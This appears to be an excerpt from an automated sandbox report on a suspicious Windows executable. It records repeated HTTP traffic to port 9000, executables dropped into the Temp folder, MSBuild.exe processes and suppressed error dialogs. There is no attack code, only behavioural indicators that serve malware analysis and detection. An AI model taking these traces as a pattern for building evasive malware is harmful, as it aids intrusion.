Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49866

Source: C:\Users\user\Desktop\QPoX60yhZt.exe

Code function: 0_2_00408761 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00408761

Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
